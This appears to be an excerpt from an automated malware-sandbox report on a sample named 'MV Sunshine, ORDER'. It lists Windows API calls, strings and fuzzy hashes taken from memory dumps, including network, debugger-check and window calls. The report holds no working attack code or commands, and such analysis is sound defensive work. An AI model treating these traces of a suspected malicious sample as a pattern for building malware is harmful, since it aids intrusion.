                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00A07DE5
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: MessageSend
                      • String ID: '
                      • API String ID: 3850602802-1997036262
                      • Opcode ID: 6b48bf3437d999f0e7a969cff87e43ac2d3440d3500ddc42d51849356ce021b0
                      • Instruction ID: d0d8e0928d3da0742028bd7558c3df6712d74c486b6883a1c32c3601d010d38f
                      • Opcode Fuzzy Hash: 6b48bf3437d999f0e7a969cff87e43ac2d3440d3500ddc42d51849356ce021b0
                      • Instruction Fuzzy Hash: B7411774E052099FDB10CF68E881BEE7BB5FF49300F10016AE905AB391D731A951CFA0
                      APIs
                      • DestroyWindow.USER32(?,?,?,?), ref: 00A06D86
                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00A06DC2
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Window$DestroyMove
                      • String ID: static
                      • API String ID: 2139405536-2160076837
                      • Opcode ID: 536bcf374cb24a7355336aadc3825cfd36749b69ceff607f99647ac7ccc8588d
                      • Instruction ID: 2b679705501c8e0f85f8462a7f0117c5096cab5ba5134fff1151d21c16178127
                      • Opcode Fuzzy Hash: 536bcf374cb24a7355336aadc3825cfd36749b69ceff607f99647ac7ccc8588d
                      • Instruction Fuzzy Hash: 2D316171210608AEEB10DF64DC80BFB77B9FF48764F148519F99597190DB31AC51DB60
                      APIs
                      • _memset.LIBCMT ref: 009E2E00
                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 009E2E3B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: InfoItemMenu_memset
                      • String ID: 0
                      • API String ID: 2223754486-4108050209
                      • Opcode ID: baed5b43d3325ce92ce419ff6127643aad72a515e49167e9ef2c1c585178d7e1
                      • Instruction ID: ac56504465c0ee0230e154d6c1f28875f2a788ce202c2e0a23edd5af7be4a4d6
                      • Opcode Fuzzy Hash: baed5b43d3325ce92ce419ff6127643aad72a515e49167e9ef2c1c585178d7e1
                      • Instruction Fuzzy Hash: BA310631600369EBEB26CF4ADC45BAEBBBDFF45350F14046DE985A61A0E7709D40CB50
                      APIs
                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00A069D0
                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00A069DB
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: MessageSend
                      • String ID: Combobox
                      • API String ID: 3850602802-2096851135
                      • Opcode ID: e303030789c9ce033f140095e085a140149755d689a1c77596de30eed6982dbc
                      • Instruction ID: 04a2b9fd7ec67c8e7363ad44dbe6ba409d36f86c25e1893ff788e5c9ea6e6ea5
                      • Opcode Fuzzy Hash: e303030789c9ce033f140095e085a140149755d689a1c77596de30eed6982dbc
                      • Instruction Fuzzy Hash: A711B27170020C6FEF119F54DC80FEB376AEB893A8F114124F958972D0D6719C6187A0
                      APIs
                        • Part of subcall function 00981D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00981D73
                        • Part of subcall function 00981D35: GetStockObject.GDI32(00000011), ref: 00981D87
                        • Part of subcall function 00981D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00981D91
                      • GetWindowRect.USER32(00000000,?), ref: 00A06EE0
                      • GetSysColor.USER32(00000012), ref: 00A06EFA
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                      • String ID: static
                      • API String ID: 1983116058-2160076837
                      • Opcode ID: dff0d141108bec47b8b0057b813d10bdfd0bbfc4b7acb15d2f2e30f5ea6654a3
                      • Instruction ID: 881a82bd7232d9232459909fc36a4de5e9d17556ca9cdb9364340366b930a77f
                      • Opcode Fuzzy Hash: dff0d141108bec47b8b0057b813d10bdfd0bbfc4b7acb15d2f2e30f5ea6654a3
                      • Instruction Fuzzy Hash: 91212C7651020EAFDB14DFA8DD45AEA7BB8FB08314F004529F955E3290D635E8619B50
                      APIs
                      • GetWindowTextLengthW.USER32(00000000), ref: 00A06C11
                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00A06C20
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: LengthMessageSendTextWindow
                      • String ID: edit
                      • API String ID: 2978978980-2167791130
                      • Opcode ID: 5cfc465574c729fb0c0e17c1ce862177220616bf83282542d6015f9937bb1f41
                      • Instruction ID: 8eb331c97afe0278d18866879dfb961e33932eaef06dc1d189b8c011b5547af1
                      • Opcode Fuzzy Hash: 5cfc465574c729fb0c0e17c1ce862177220616bf83282542d6015f9937bb1f41
                      • Instruction Fuzzy Hash: 10116AB154020CAFEB209F64AC45AAB3769EB06378F604724F961D71E0C775DCA29B60
                      APIs
                      • _memset.LIBCMT ref: 009E2F11
                      • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 009E2F30
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: InfoItemMenu_memset
                      • String ID: 0
                      • API String ID: 2223754486-4108050209
                      • Opcode ID: 56aa3ad2001c1c16f99b4a2894284038c4af8e300202485b326aa720a3fc1a05
                      • Instruction ID: 5b718c4515bb916ebb427249884cc733f47217889fd043c38e78e73ae33c40b1
                      • Opcode Fuzzy Hash: 56aa3ad2001c1c16f99b4a2894284038c4af8e300202485b326aa720a3fc1a05
                      • Instruction Fuzzy Hash: 711101359012A8ABDB26DB9ADC04BAD73BDEB42310F1804B5F844A72A0D7B0EE05C791
                      APIs
                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 009F2520
                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 009F2549
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Internet$OpenOption
                      • String ID: <local>
                      • API String ID: 942729171-4266983199
                      • Opcode ID: 21adde23335d31cb6d4f9ca02219e9814caa4324683b555f1aafe3079ca076da
                      • Instruction ID: 0b4d46e3fd126d773330ae8c68b3e2462a674ad91fc5a187e8fb03e2b4179e25
                      • Opcode Fuzzy Hash: 21adde23335d31cb6d4f9ca02219e9814caa4324683b555f1aafe3079ca076da
                      • Instruction Fuzzy Hash: 9111A0B0541229BEDB248F518C99FBBFF6CFF16751F10852AFA0556040D2B0A942DBF1
                      APIs
                        • Part of subcall function 009F830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,009F80C8,?,00000000,?,?), ref: 009F8322
                      • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 009F80CB
                      • htons.WSOCK32(00000000,?,00000000), ref: 009F8108
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: ByteCharMultiWidehtonsinet_addr
                      • String ID: 255.255.255.255
                      • API String ID: 2496851823-2422070025
                      • Opcode ID: 2e366793038a61debf72121b3ad4a12e11baee63268e89480012beb34211e1ca
                      • Instruction ID: 16b05bdc6de98cd80a7097c9841732cf07a18c23afac06265baa56a138f7e814
                      • Opcode Fuzzy Hash: 2e366793038a61debf72121b3ad4a12e11baee63268e89480012beb34211e1ca
                      • Instruction Fuzzy Hash: 34118235644209ABDB20AF64CC56BBEB368EF44310F108617EA11A7291DA71A8158755
                      APIs
                        • Part of subcall function 00987F41: _memmove.LIBCMT ref: 00987F82
                        • Part of subcall function 009DB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 009DB0E7
                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 009D9355
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: ClassMessageNameSend_memmove
                      • String ID: ComboBox$ListBox
                      • API String ID: 372448540-1403004172
                      • Opcode ID: c1045fc515a54a40864d7531d48f19405ab12b223c0d2a2b3028f323e2509a43
                      • Instruction ID: f5e99b4a230b1b616d04c10e9463a33f2a70d3726902b8feea278c5d448c2c84
                      • Opcode Fuzzy Hash: c1045fc515a54a40864d7531d48f19405ab12b223c0d2a2b3028f323e2509a43
                      • Instruction Fuzzy Hash: FC01B571A45214ABCB08FBA5CC919FEB76DBF46720B144A1AF932573D1DB31590C8750
                      APIs
                        • Part of subcall function 00987F41: _memmove.LIBCMT ref: 00987F82
                        • Part of subcall function 009DB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 009DB0E7
                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 009D924D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: ClassMessageNameSend_memmove
                      • String ID: ComboBox$ListBox
                      • API String ID: 372448540-1403004172
                      • Opcode ID: 6bee05fb2ac783465120f537bb269a4d96dddddd921329935f01566ed373e61b
                      • Instruction ID: 2b78fbd0d62e9cdfd232f8a9f2b0168a9ea1420840b673778b13c02d71bb4424
                      • Opcode Fuzzy Hash: 6bee05fb2ac783465120f537bb269a4d96dddddd921329935f01566ed373e61b
                      • Instruction Fuzzy Hash: DA018475A81108BBCB18FBA0C992EFF73ACAF55700F25411ABA1267381EB159F0C9661
                      APIs
                        • Part of subcall function 00987F41: _memmove.LIBCMT ref: 00987F82
                        • Part of subcall function 009DB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 009DB0E7
                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 009D92D0
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: ClassMessageNameSend_memmove
                      • String ID: ComboBox$ListBox
                      • API String ID: 372448540-1403004172
                      • Opcode ID: a8dcf74ea5c94ad34a64e7b719f8e4a8221faecba796939e872337c7a861e5de
                      • Instruction ID: 17e908b51e0c69b84f870499071038b5caf2c8c456e4aa9699e727f7831f2df8
                      • Opcode Fuzzy Hash: a8dcf74ea5c94ad34a64e7b719f8e4a8221faecba796939e872337c7a861e5de
                      • Instruction Fuzzy Hash: 6401DB71A811087BCB04FBA4C982FFF77ACAF11700F254516791263381DB259F0C9271
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: ClassName_wcscmp
                      • String ID: #32770
                      • API String ID: 2292705959-463685578
                      • Opcode ID: c014ec2abb1b35c5267179107a878e13ea24122e0e3bbfccd8f1af60afb8f608
                      • Instruction ID: 0b56251ac1bc37cec3409b14cb620bd8cc4463b8500191e18f8e26a9355c6752
                      • Opcode Fuzzy Hash: c014ec2abb1b35c5267179107a878e13ea24122e0e3bbfccd8f1af60afb8f608
                      • Instruction Fuzzy Hash: 30E0613390022C2BD320DAD59C05F97F7ACEB51731F000157FD10D3050D660994587D1
                      APIs
                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 009D81CA
                        • Part of subcall function 009A3598: _doexit.LIBCMT ref: 009A35A2
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Message_doexit
                      • String ID: AutoIt$Error allocating memory.
                      • API String ID: 1993061046-4017498283
                      • Opcode ID: bfd43c7424096a1c04b92cbd6e54fe6789d1401b07e53380433af9dafb11627c
                      • Instruction ID: fe20991db16de87f17ffcc73dd33948970e897007d493e3e8a4e7b3876f5b27f
                      • Opcode Fuzzy Hash: bfd43c7424096a1c04b92cbd6e54fe6789d1401b07e53380433af9dafb11627c
                      • Instruction Fuzzy Hash: 07D05B323C536936D21533E86C07FC7754C4F45B51F004416BB08565D38DD295D242D9
                      APIs
                        • Part of subcall function 009BB564: _memset.LIBCMT ref: 009BB571
                        • Part of subcall function 009A0B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,009BB540,?,?,?,0098100A), ref: 009A0B89
                      • IsDebuggerPresent.KERNEL32(?,?,?,0098100A), ref: 009BB544
                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0098100A), ref: 009BB553
                      Strings
                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 009BB54E
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                      • API String ID: 3158253471-631824599
                      • Opcode ID: 96a4e74eaedb2b082ef02a2161f7ef23b73f09cf9c3b04412ffa8aa450b4ce77
                      • Instruction ID: 72ebf6f3aa9e25c830972aa5bb4ae76b35a5df4a94fd4304e4397cbdd345e705
                      • Opcode Fuzzy Hash: 96a4e74eaedb2b082ef02a2161f7ef23b73f09cf9c3b04412ffa8aa450b4ce77
                      • Instruction Fuzzy Hash: B6E06D746003148FD730DF68E6043827BE4AF44724F00893CF456C6690D7F4E409CBA2
                      APIs
                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00A05BF5
                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00A05C08
                        • Part of subcall function 009E54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 009E555E
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: FindMessagePostSleepWindow
                      • String ID: Shell_TrayWnd
                      • API String ID: 529655941-2988720461
                      • Opcode ID: 2ea058e18f42006139a1c24e9c6ff6d17108d9c49849bf56d5ff880505c5dc06
                      • Instruction ID: 1806c395996d3e93e2ae6ab1ee7f862d97f547a0e9420caa0e0b96b86048d9b1
                      • Opcode Fuzzy Hash: 2ea058e18f42006139a1c24e9c6ff6d17108d9c49849bf56d5ff880505c5dc06
                      • Instruction Fuzzy Hash: 0AD0C931388355BBE778ABB0AC1BF976A14AB50B51F014829B645AA1E0D9E46802C650